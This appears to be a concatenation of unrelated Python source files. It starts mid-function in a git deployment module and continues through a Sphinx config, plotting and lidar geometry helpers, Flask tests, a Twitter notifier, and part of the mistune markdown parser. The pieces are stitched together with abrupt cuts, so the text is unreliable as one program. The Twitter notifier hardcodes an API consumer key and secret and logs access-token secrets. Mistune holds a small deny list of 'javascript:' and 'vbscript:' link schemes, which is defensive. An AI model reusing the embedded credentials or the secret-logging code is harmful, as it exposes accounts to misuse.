            result.update(submodules_changed=submodules_updated)

            if module.check_mode:
                result.update(changed=True, after=remote_head)
                module.exit_json(**result)

            # Switch to version specified
            submodule_update(git_path, module, dest, track_submodules, force=force)

    # determine if we changed anything
    result['after'] = get_version(module, git_path, dest)

    if result['before'] != result['after'] or local_mods or submodules_updated or remote_url_changed:
        result.update(changed=True)
        if module._diff:
            diff = get_diff(module, git_path, dest, repo, remote, depth, bare, result['before'], result['after'])
            if diff:
                result['diff'] = diff

    if archive:
        # Git archive is not supported by all git servers, so
        # we will first clone and perform git archive from local directory
        if module.check_mode:
            result.update(changed=True)
            module.exit_json(**result)

        create_archive(git_path, module, dest, archive, archive_prefix, version, repo, result)

    module.exit_json(**result)


if __name__ == '__main__':
    main()

# -*- coding: utf-8 -*-
#
# Stetl documentation build configuration file, created by
# sphinx-quickstart on Sun Jun  2 11:01:36 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

import sys, os

# indicate Sphinx is building (to replace @Config decorators)
os.environ['SPHINX_BUILD'] = '1'

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('../'))

# -- General configuration -----------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.viewcode']

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'Stetl'
copyright = u'2013+, Just van den Broecke'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.2-dev'
# The full version, including alpha/beta/rc tags.
release = '1.2-dev'

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []

# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []


# -- Options for HTML output ---------------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
html_theme = 'default'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []

# The name for this set of Sphinx documents.  If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar.  Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs.  This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it.  The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'Stetldoc'


# -- Options for LaTeX output --------------------------------------------------

latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',

# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',

# Additional stuff for the LaTeX preamble.
#'preamble': '',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
  ('index', 'Stetl.tex', u'Stetl Documentation',
   u'Just van den Broecke', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True


# -- Options for manual page output --------------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'stetl', u'Stetl Documentation',
     [u'Just van den Broecke'], 1)
]

# If true, show URL addresses after external links.
#man_show_urls = False


# -- Options for Texinfo output ------------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
  ('index', 'Stetl', u'Stetl Documentation',
   u'Just van den Broecke', 'Stetl', 'One line description of project.',
   'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
#texinfo_appendices = []

# If false, no module index is generated.
#texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'

def plotHistory(plot_context, axes):
    """
    @type axes: matplotlib.axes.Axes
    @type plot_config: PlotConfig
    """
    plot_config = plot_context.plotConfig()

    if (
        not plot_config.isHistoryEnabled()
        or plot_context.history_data is None
        or plot_context.history_data.empty
    ):
        return

    data = plot_context.history_data

    style = plot_config.historyStyle()

    lines = axes.plot_date(
        x=data.index.values,
        y=data,
        color=style.color,
        alpha=style.alpha,
        marker=style.marker,
        linestyle=style.line_style,
        linewidth=style.width,
        markersize=style.size,
    )

    if len(lines) > 0 and style.isVisible():
        plot_config.addLegendItem("History", lines[0])

# -*- coding: UTF-8 -*-

"""
Desc: django util.
Note:

---------------------------------------
# 2016/04/30   kangtian         created

"""
from hashlib import md5


def gen_md5(content_str):
    m = md5()
    m.update(content_str)
    return m.hexdigest()

# Author: Nic Wolfe <nic@wolfeden.ca>
# URL: http://code.google.com/p/lazylibrarian/
#
# This file is part of Sick Beard.
#
# Sick Beard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Sick Beard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#  GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Sick Beard.  If not, see <http://www.gnu.org/licenses/>.

import lazylibrarian

from lazylibrarian import logger, common, formatter

# parse_qsl moved to urlparse module in v2.6
try:
    from urlparse import parse_qsl #@UnusedImport
except:
    from cgi import parse_qsl #@Reimport

import lib.oauth2 as oauth
import lib.pythontwitter as twitter

class TwitterNotifier:

    consumer_key = "208JPTMMnZjtKWA4obcH8g"
    consumer_secret = "BKaHzaQRd5PK6EH8EqPZ1w8mz6NSk9KErArarinHutk"
    
    REQUEST_TOKEN_URL = 'https://api.twitter.com/oauth/request_token'
    ACCESS_TOKEN_URL  = 'https://api.twitter.com/oauth/access_token'
    AUTHORIZATION_URL = 'https://api.twitter.com/oauth/authorize'
    SIGNIN_URL        = 'https://api.twitter.com/oauth/authenticate'
    
    def notify_snatch(self, title):
        if lazylibrarian.TWITTER_NOTIFY_ONSNATCH:
            self._notifyTwitter(common.notifyStrings[common.NOTIFY_SNATCH]+': '+title)

    def notify_download(self, title):
        if lazylibrarian.TWITTER_NOTIFY_ONDOWNLOAD:
            self._notifyTwitter(common.notifyStrings[common.NOTIFY_DOWNLOAD]+': '+title)

    def test_notify(self):
        return self._notifyTwitter("This is a test notification from LazyLibrarian / " + formatter.now(), force=True)

    def _get_authorization(self):
    
        signature_method_hmac_sha1 = oauth.SignatureMethod_HMAC_SHA1() #@UnusedVariable
        oauth_consumer             = oauth.Consumer(key=self.consumer_key, secret=self.consumer_secret)
        oauth_client               = oauth.Client(oauth_consumer)
    
        logger.info('Requesting temp token from Twitter')
    
        resp, content = oauth_client.request(self.REQUEST_TOKEN_URL, 'GET')
    
        if resp['status'] != '200':
            logger.info('Invalid respond from Twitter requesting temp token: %s' % resp['status'])
        else:
            request_token = dict(parse_qsl(content))
    
            lazylibrarian.TWITTER_USERNAME = request_token['oauth_token']
            lazylibrarian.TWITTER_PASSWORD = request_token['oauth_token_secret']
    
            return self.AUTHORIZATION_URL+"?oauth_token="+ request_token['oauth_token']
    
    def _get_credentials(self, key):
        request_token = {}
    
        request_token['oauth_token'] = lazylibrarian.TWITTER_USERNAME
        request_token['oauth_token_secret'] = lazylibrarian.TWITTER_PASSWORD
        request_token['oauth_callback_confirmed'] = 'true'
    
        token = oauth.Token(request_token['oauth_token'], request_token['oauth_token_secret'])
        token.set_verifier(key)
    
        logger.info('Generating and signing request for an access token using key '+key)
    
        signature_method_hmac_sha1 = oauth.SignatureMethod_HMAC_SHA1() #@UnusedVariable
        oauth_consumer             = oauth.Consumer(key=self.consumer_key, secret=self.consumer_secret)
        logger.info('oauth_consumer: '+str(oauth_consumer))
        oauth_client  = oauth.Client(oauth_consumer, token)
        logger.info('oauth_client: '+str(oauth_client))
        resp, content = oauth_client.request(self.ACCESS_TOKEN_URL, method='POST', body='oauth_verifier=%s' % key)
        logger.info('resp, content: '+str(resp)+','+str(content))
    
        access_token  = dict(parse_qsl(content))
        logger.info('access_token: '+str(access_token))
    
        logger.info('resp[status] = '+str(resp['status']))
        if resp['status'] != '200':
            logger.error('The request for a token with did not succeed: '+str(resp['status']))
            return False
        else:
            logger.info('Your Twitter Access Token key: %s' % access_token['oauth_token'])
            logger.info('Access Token secret: %s' % access_token['oauth_token_secret'])
            lazylibrarian.TWITTER_USERNAME = access_token['oauth_token']
            lazylibrarian.TWITTER_PASSWORD = access_token['oauth_token_secret']
            return True
    
    
    def _send_tweet(self, message=None):
    
        username=self.consumer_key
        password=self.consumer_secret
        access_token_key=lazylibrarian.TWITTER_USERNAME
        access_token_secret=lazylibrarian.TWITTER_PASSWORD
    
        logger.info(u"Sending tweet: "+message)
    
        api = twitter.Api(username, password, access_token_key, access_token_secret)
    
        try:
            api.PostUpdate(message)
        except Exception, e:
            logger.error(u"Error Sending Tweet: %s" %e)
            return False
    
        return True
    
    def _notifyTwitter(self, message='', force=False):
        prefix = lazylibrarian.TWITTER_PREFIX
    
        if not lazylibrarian.USE_TWITTER and not force:
            return False
    
        return self._send_tweet(prefix+": "+message)

notifier = TwitterNotifier
import numpy as np
import laspy as las

# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False.  The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):

    n = len(poly)
    inside = False

    p1x,p1y = poly[0]
    for i in range(n+1):
        p2x,p2y = poly[i % n]
        if y > min(p1y,p2y):
            if y <= max(p1y,p2y):
                if x <= max(p1x,p2x):
                    if p1y != p2y:
                        xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
                    if p1x == p2x or x <= xints:
                        inside = not inside
        p1x,p1y = p2x,p2y

    return inside

# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing.  This saves a fair bit of looping.
def points_in_poly(x,y,poly):
    n = len(poly)
    inside=np.zeros(x.size,dtype=bool)
    xints=np.zeros(x.size)

    p1x,p1y = poly[0]
    for i in range(n+1):
        p2x,p2y=poly[i % n]
        if p1y!=p2y:
            xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
        if p1x==p2x:
            inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
        else:
            inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
        p1x,p1y = p2x,p2y

    return x[inside],y[inside], inside

# This retrieves all points within circular neighbourhood,  Terget point is the location around which the neighbourhood search is conducted, for a specified search radius.  x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
    inside=np.zeros(x.size,dtype=bool)
    d2=(x-target_x)**2+(y-target_y)**2
    inside = d2<=radius**2
    return x[inside],y[inside], inside

# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
    pts = np.zeros((0,in_pts.shape[1]))
    if in_pts.shape[0]>0:
        if filter_by_first_return_location:
            # find first returns
            mask = in_pts[:,3]==1
            x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
            shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
            inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
            x = in_pts[inside,0]
            y = in_pts[inside,1]
            x_temp=None
            y_temp=None
            inside_temp=None
        else:
            x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
        pts = in_pts[inside,:]
    else:
        print("\t\t\t no points in polygon")
    return pts

# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
    pts = np.zeros((0,in_pts.shape[1]))
    if in_pts.shape[0]>0:
        x,y,inside =  points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
        pts = in_pts[inside,:]
    else:
        print( "\t\t\t no points in neighbourhood")
    return pts

from flask import json
from unittest.mock import patch, Mock

from urbansearch.gathering.indices_selector import IndicesSelector
from urbansearch.server.main import Server
from urbansearch.server import classify_documents
from urbansearch.server.classify_documents import _join_workers
from urbansearch.workers import Workers

s = Server(run=False)

@patch('urbansearch.server.classify_documents._join_workers')
@patch.object(Workers, 'run_classifying_workers')
@patch.object(IndicesSelector, 'run_workers')
def test_download_indices_for_url(mock_rcw, mock_rw, mock_jw):
    with s.app.test_client() as c:
        resp = c.get('/api/v1/classify_documents/log_only?directory=test')

        assert mock_rcw.called
        assert mock_rw.called
        assert mock_jw.called


@patch('urbansearch.server.classify_documents._join_workers')
@patch.object(Workers, 'run_classifying_workers')
@patch.object(IndicesSelector, 'run_workers')
def test_classify_indices_to_db(mock_rcw, mock_rw, mock_jw):
    with s.app.test_client() as c:
        resp = c.get('/api/v1/classify_documents/to_database?directory=test')

        assert mock_rcw.called
        assert mock_rw.called
        assert mock_jw.called


@patch('urbansearch.server.classify_documents._join_workers')
@patch('urbansearch.server.classify_documents.db_utils')
def test_classify_indices_to_db_no_connection(mock_db, mock_jw):
    mock_db.connected_to_db.return_value = False

    with s.app.test_client() as c:
        resp = c.get('/api/v1/classify_documents/to_database?directory=test')
        assert not mock_jw.called


@patch('urbansearch.server.classify_documents._join_file_workers')
@patch.object(Workers, 'run_classifying_workers')
@patch.object(Workers, 'run_read_files_worker')
def test_classify_textfiles_to_db(mock_rfw, mock_rw, mock_jw):
    classify_documents.classify_textfiles_to_db(0, 'test')

    assert mock_rfw.called
    assert mock_rw.called
    assert mock_jw.called


@patch('urbansearch.server.classify_documents._join_workers')
@patch('urbansearch.server.classify_documents.db_utils')
def test_classify_textfiles_to_db_no_connection(mock_db, mock_jw):
    mock_db.connected_to_db.return_value = False
    classify_documents.classify_textfiles_to_db(0, None)
    assert not mock_jw.called


def test_join_workers():
    producers = [Mock()]
    cworker = Mock()
    consumers = [Mock()]

    classify_documents._join_workers(cworker, producers, consumers)
    
    for p in producers:
        assert p.join.called
    assert cworker.set_producers_done.called
    for c in consumers:
        assert c.join.called
    assert cworker.clear_producers_done.called


def test_join_file_workers():
    producers = [Mock()]
    cworker = Mock()
    consumers = [Mock()]

    classify_documents._join_file_workers(cworker, producers, consumers)
    
    for p in producers:
        assert p.join.called
    assert cworker.set_file_producers_done.called
    for c in consumers:
        assert c.join.called
    assert cworker.clear_file_producers_done.called

#-*- coding:utf-8 -*-

from findbilibili import *

#funtion name [checkinfo]
#判断要输出的回答
#param array 抓取的文字
#return string 回答
def checkinfo2(content):
    content[1] = content[1].decode('gbk')
    key = content[1].encode('utf-8')
    if key == '节操':
        return '这种东西早就没有了'


    result = animation(key)    #搜动漫
    return result
    

#funtion name [animation]
#搜索动漫
#param array 动漫名字
#return string 最后更新网址
def animation(name):
    url = bilibili(name)
    try:
        result = 'bilibili最后更新:第'+url[-1][0]+'集'+url[-1][1]
        return result
    except IndexError:
        return '什么都找不到！'
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-

__author__ = """Co-Pierre Georg (co-pierre.georg@uct.ac.za)"""

import sys
from src.paralleltools import Parallel

#-------------------------------------------------------------------------
#
#  conftools.py is a simple module to manage .xml configuration files
#
#-------------------------------------------------------------------------
if __name__ == '__main__':

    """
    VARIABLES
    """
    args = sys.argv
    config_file_name = args[1]

    """
    CODE
    """
    parallel = Parallel()
    parallel.create_config_files(config_file_name)

# coding: utf-8
"""
    mistune
    ~~~~~~~

    The fastest markdown parser in pure Python with renderer feature.

    :copyright: (c) 2014 - 2016 by Hsiaoming Yang.
"""

import re
import inspect

__version__ = '0.7.3'
__author__ = 'Hsiaoming Yang <me@lepture.com>'
__all__ = [
    'BlockGrammar', 'BlockLexer',
    'InlineGrammar', 'InlineLexer',
    'Renderer', 'Markdown',
    'markdown', 'escape',
]


_key_pattern = re.compile(r'\s+')
_nonalpha_pattern = re.compile(r'\W')
_escape_pattern = re.compile(r'&(?!#?\w+;)')
_newline_pattern = re.compile(r'\r\n|\r')
_block_quote_leading_pattern = re.compile(r'^ *> ?', flags=re.M)
_block_code_leading_pattern = re.compile(r'^ {4}', re.M)
_inline_tags = [
    'a', 'em', 'strong', 'small', 's', 'cite', 'q', 'dfn', 'abbr', 'data',
    'time', 'code', 'var', 'samp', 'kbd', 'sub', 'sup', 'i', 'b', 'u', 'mark',
    'ruby', 'rt', 'rp', 'bdi', 'bdo', 'span', 'br', 'wbr', 'ins', 'del',
    'img', 'font',
]
_pre_tags = ['pre', 'script', 'style']
_valid_end = r'(?!:/|[^\w\s@]*@)\b'
_valid_attr = r'''\s*[a-zA-Z\-](?:\=(?:"[^"]*"|'[^']*'|\d+))*'''
_block_tag = r'(?!(?:%s)\b)\w+%s' % ('|'.join(_inline_tags), _valid_end)
_scheme_blacklist = ('javascript:', 'vbscript:')


def _pure_pattern(regex):
    pattern = regex.pattern
    if pattern.startswith('^'):
        pattern = pattern[1:]
    return pattern


def _keyify(key):
    return _key_pattern.sub(' ', key.lower())


def escape(text, quote=False, smart_amp=True):
    """Replace special characters "&", "<" and ">" to HTML-safe sequences.

    The original cgi.escape will always escape "&", but you can control
    this one for a smart escape amp.

    :param quote: if set to True, " and ' will be escaped.
    :param smart_amp: if set to False, & will always be escaped.
    """
    if smart_amp:
        text = _escape_pattern.sub('&amp;', text)
    else:
        text = text.replace('&', '&amp;')
    text = text.replace('<', '&lt;')
    text = text.replace('>', '&gt;')
    if quote:
        text = text.replace('"', '&quot;')
        text = text.replace("'", '&#39;')
    return text


def escape_link(url):
    """Remove dangerous URL schemes like javascript: and escape afterwards."""
    lower_url = url.lower().strip('\x00\x1a \n\r\t')
    for scheme in _scheme_blacklist:
        if lower_url.startswith(scheme):
            return ''
    return escape(url, quote=True, smart_amp=False)


def preprocessing(text, tab=4):
    text = _newline_pattern.sub('\n', text)
    text = text.expandtabs(tab)
    text = text.replace('\u00a0', ' ')
    text = text.replace('\u2424', '\n')
    pattern = re.compile(r'^ +$', re.M)
    return pattern.sub('', text)


class BlockGrammar(object):
    """Grammars for block level tokens."""

    def_links = re.compile(
        r'^ *\[([^^\]]+)\]: *'  # [key]:
        r'<?([^\s>]+)>?'  # <link> or link
        r'(?: +["(]([^\n]+)[")])? *(?:\n+|$)'
    )
    def_footnotes = re.compile(
        r'^\[\^([^\]]+)\]: *('
        r'[^\n]*(?:\n+|$)'  # [^key]:
        r'(?: {1,}[^\n]*(?:\n+|$))*'
        r')'
    )

    newline = re.compile(r'^\n+')
    block_code = re.compile(r'^( {4}[^\n]+\n*)+')
    fences = re.compile(
        r'^ *(`{3,}|~{3,}) *(\S+)? *\n'  # ```lang
        r'([\s\S]+?)\s*'
        r'\1 *(?:\n+|$)'  # ```
    )
    hrule = re.compile(r'^ {0,3}[-*_](?: *[-*_]){2,} *(?:\n+|$)')
    heading = re.compile(r'^ *(#{1,6}) *([^\n]+?) *#* *(?:\n+|$)')
    lheading = re.compile(r'^([^\n]+)\n *(=|-)+ *(?:\n+|$)')
    block_quote = re.compile(r'^( *>[^\n]+(\n[^\n]+)*\n*)+')
    list_block = re.compile(
        r'^( *)([*+-]|\d+\.) [\s\S]+?'
        r'(?:'
        r'\n+(?=\1?(?:[-*_] *){3,}(?:\n+|$))'  # hrule
        r'|\n+(?=%s)'  # def links
        r'|\n+(?=%s)'  # def footnotes
        r'|\n{2,}'
        r'(?! )'
        r'(?!\1(?:[*+-]|\d+\.) )\n*'
        r'|'
        r'\s*$)' % (
            _pure_pattern(def_links),
            _pure_pattern(def_footnotes),
        )
    )
    list_item = re.compile(
        r'^(( *)(?:[*+-]|\d+\.) [^\n]*'
        r'(?:\n(?!\2(?:[*+-]|\d+\.) )[^\n]*)*)',
        flags=re.M
    )
    list_bullet = re.compile(r'^ *(?:[*+-]|\d+\.) +')
    paragraph = re.compile(
        r'^((?:[^\n]+\n?(?!'
        r'%s|%s|%s|%s|%s|%s|%s|%s|%s'
        r'))+)\n*' % (
            _pure_pattern(fences).replace(r'\1', r'\2'),
            _pure_pattern(list_block).replace(r'\1', r'\3'),
            _pure_pattern(hrule),
            _pure_pattern(heading),
            _pure_pattern(lheading),
            _pure_pattern(block_quote),
            _pure_pattern(def_links),
            _pure_pattern(def_footnotes),
            '<' + _block_tag,
        )
    )
    block_html = re.compile(
        r'^ *(?:%s|%s|%s) *(?:\n{2,}|\s*$)' % (
            r'<!--[\s\S]*?-->',
            r'<(%s)((?:%s)*?)>([\s\S]*?)<\/\1>' % (_block_tag, _valid_attr),
            r'<%s(?:%s)*?\s*\/?>' % (_block_tag, _valid_attr),
        )
    )
    table = re.compile(
        r'^ *\|(.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*'
    )
    nptable = re.compile(
        r'^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*'
    )
    text = re.compile(r'^[^\n]+')


class BlockLexer(object):
    """Block level lexer for block grammars."""
    grammar_class = BlockGrammar

    default_rules = [
        'newline', 'hrule', 'block_code', 'fences', 'heading',
        'nptable', 'lheading', 'block_quote',
        'list_block', 'block_html', 'def_links',
        'def_footnotes', 'table', 'paragraph', 'text'
    ]

    list_rules = (
        'newline', 'block_code', 'fences', 'lheading', 'hrule',
        'block_quote', 'list_block', 'block_html', 'text',
    )

    footnote_rules = (
        'newline', 'block_code', 'fences', 'heading',
        'nptable', 'lheading', 'hrule', 'block_quote',
        'list_block', 'block_html', 'table', 'paragraph', 'text'
    )

    def __init__(self, rules=None, **kwargs):
        self.tokens = []
        self.def_links = {}
        self.def_footnotes = {}

        if not rules:
            rules = self.grammar_class()

        self.rules = rules

    def __call__(self, text, rules=None):
        return self.parse(text, rules)

    def parse(self, text, rules=None):
        text = text.rstrip('\n')

        if not rules:
            rules = self.default_rules

        def manipulate(text):
            for key in rules:
                rule = getattr(self.rules, key)
                m = rule.match(text)
                if not m:
                    continue
                getattr(self, 'parse_%s' % key)(m)
                return m
            return False  # pragma: no cover

        while text:
            m = manipulate(text)
            if m is not False:
                text = text[len(m.group(0)):]
                continue
            if text:  # pragma: no cover
                raise RuntimeError('Infinite loop at: %s' % text)
        return self.tokens

    def parse_newline(self, m):
        length = len(m.group(0))
        if length > 1:
            self.tokens.append({'type': 'newline'})

    def parse_block_code(self, m):
        # clean leading whitespace
        code = _block_code_leading_pattern.sub('', m.group(0))
        self.tokens.append({
            'type': 'code',
            'lang': None,
            'text': code,
        })

    def parse_fences(self, m):
        self.tokens.append({
            'type': 'code',
            'lang': m.group(2),
            'text': m.group(3),
        })

    def parse_heading(self, m):
        self.tokens.append({
            'type': 'heading',
            'level': len(m.group(1)),
            'text': m.group(2),
        })

    def parse_lheading(self, m):
        """Parse setext heading."""
        self.tokens.append({
            'type': 'heading',
            'level': 1 if m.group(2) == '=' else 2,
            'text': m.group(1),
        })

    def parse_hrule(self, m):
        self.tokens.append({'type': 'hrule'})

    def parse_list_block(self, m):
        bull = m.group(2)
        self.tokens.append({
            'type': 'list_start',
            'ordered': '.' in bull,
        })
        cap = m.group(0)
        self._process_list_item(cap, bull)
        self.tokens.append({'type': 'list_end'})

    def _process_list_item(self, cap, bull):
        cap = self.rules.list_item.findall(cap)

        _next = False
        length = len(cap)

        for i in range(length):
            item = cap[i][0]

            # remove the bullet
            space = len(item)
            item = self.rules.list_bullet.sub('', item)

            # outdent
            if '\n ' in item:
                space = space - len(item)
                pattern = re.compile(r'^ {1,%d}' % space, flags=re.M)
                item = pattern.sub('', item)

            # determine whether item is loose or not
            loose = _next
            if not loose and re.search(r'\n\n(?!\s*$)', item):
                loose = True

            rest = len(item)
            if i != length - 1 and rest:
                _next = item[rest-1] == '\n'
                if not loose:
                    loose = _next

            if loose:
                t = 'loose_item_start'
            else:
                t = 'list_item_start'

            self.tokens.append({'type': t})
            # recurse
            self.parse(item, self.list_rules)
            self.tokens.append({'type': 'list_item_end'})

    def parse_block_quote(self, m):
        self.tokens.append({'type': 'block_quote_start'})
        # clean leading >
        cap = _block_quote_leading_pattern.sub('', m.group(0))
        self.parse(cap)
        self.tokens.append({'type': 'block_quote_end'})

    def parse_def_links(self, m):
        key = _keyify(m.group(1))
        self.def_links[key] = {
            'link': m.group(2),
            'title': m.group(3),
        }

    def parse_def_footnotes(self, m):
        key = _keyify(m.group(1))
        if key in self.def_footnotes:
            # footnote is already defined
            return

        self.def_footnotes[key] = 0

        self.tokens.append({
            'type': 'footnote_start',
            'key': key,
        })

        text = m.group(2)

        if '\n' in text:
            lines = text.split('\n')
            whitespace = None
            for line in lines[1:]:
                space = len(line) - len(line.lstrip())
                if space and (not whitespace or space < whitespace):
                    whitespace = space
            newlines = [lines[0]]
            for line in lines[1:]:
                newlines.append(line[whitespace:])
            text = '\n'.join(newlines)

        self.parse(text, self.footnote_rules)

        self.tokens.append({
            'type': 'footnote_end',
            'key': key,
        })

    def parse_table(self, m):
        item = self._process_table(m)

        cells = re.sub(r'(?: *\| *)?\n$', '', m.group(3))
        cells = cells.split('\n')
        for i, v in enumerate(cells):
            v = re.sub(r'^ *\| *| *\| *$', '', v)
            cells[i] = re.split(r' *\| *', v)

        item['cells'] = cells
        self.tokens.append(item)

    def parse_nptable(self, m):
        item = self._process_table(m)

        cells = re.sub(r'\n$', '', m.group(3))
        cells = cells.split('\n')
        for i, v in enumerate(cells):
            cells[i] = re.split(r' *\| *', v)

        item['cells'] = cells
        self.tokens.append(item)

    def _process_table(self, m):
        header = re.sub(r'^ *| *\| *$', '', m.group(1))
        header = re.split(r' *\| *', header)
        align = re.sub(r' *|\| *$', '', m.group(2))
        align = re.split(r' *\| *', align)

        for i, v in enumerate(align):
            if re.search(r'^ *-+: *$', v):
                align[i] = 'right'
            elif re.search(r'^ *:-+: *$', v):
                align[i] = 'center'
            elif re.search(r'^ *:-+ *$', v):
                align[i] = 'left'
            else:
                align[i] = None

        item = {
            'type': 'table',
            'header': header,
            'align': align,
        }
        return item

    def parse_block_html(self, m):
        tag = m.group(1)
        if not tag:
            text = m.group(0)
            self.tokens.append({
                'type': 'close_html',
                'text': text
            })
        else:
            attr = m.group(2)
            text = m.group(3)
            self.tokens.append({
                'type': 'open_html',
                'tag': tag,
                'extra': attr,
                'text': text
            })

    def parse_paragraph(self, m):
        text = m.group(1).rstrip('\n')
        self.tokens.append({'type': 'paragraph', 'text': text})

    def parse_text(self, m):
        text = m.group(0)
        self.tokens.append({'type': 'text', 'text': text})


